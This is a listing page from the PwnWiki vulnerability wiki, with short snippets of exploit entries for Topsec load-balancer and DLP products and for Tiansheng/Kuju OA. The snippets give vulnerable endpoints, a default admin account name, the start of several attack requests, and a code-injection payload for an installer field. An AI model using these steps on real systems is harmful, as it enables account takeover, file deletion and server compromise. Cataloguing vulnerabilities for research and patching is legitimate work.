天融信负载均衡TopApp-LB Sql注入漏洞
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞利用 利用 天融信负载均衡TopApp-LB任意登陆 进入后台,提交以下数据包: POST /acc/clsf/report/datasource.php HTTP/1.1 H ...
PwnWiki - 免費、自由、人人可編輯的漏洞庫 - pwnwiki.backup
-
-
天融信数据防泄漏系统越权修改管理员密码漏洞
免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd,接口未授权访问,造成直接修改任意用户密 ...
-
天融信DLP 未授权&越权漏洞
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞原理 管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。 默认用户 superman --- uid=1 Payload POST ...
-
天生创想OA&苦菊OA重装系统Getshell漏洞/zh-cn
免费、自由、人人可编辑的漏洞库 , 漏洞利用 第二步:填写服务器配置信息 - 数据库名称写入以下Payload: kuju');phpinfo();// 访问 http://www.xxxx.com/config.php 免费、自由、人人( ...
-
天生创想OA&苦菊OA重装系统Getshell漏洞
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , 漏洞利用 第二步:填写服务器配置信息 - 数据库名称写入以下Payload: kuju');phpinfo();// 访问 http://www.xxxx.com/config.p ...
-
天生创想OA&苦菊OA未授权任意文件上传漏洞/zh-cn
PWNWIK.COM , POC POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win ...
-
天生创想OA&苦菊OA未授权任意文件上传漏洞
pwnwiki.com , POC POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Wi ...
-
天生创想OA&苦菊OA任意文件删除漏洞/zh-cn
pwnwiki.com , POC 删除1.php POST/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1 Host: www.kuju.com User-Agent: ...
-
天生创想OA&苦菊OA任意文件删除漏洞
免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC 删除1.php POST/admin.php?ac=data&fileurl=mana&do=update HTTP/1.1 Host: www.kuju ...
-
天生创想OA&苦菊OA任意文件上传漏洞/zh-cn
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , 漏洞利用 后台登录页 - 系统设置 - 附件上传类型 添加新的后缀php,上传头像 PWNWIK.COM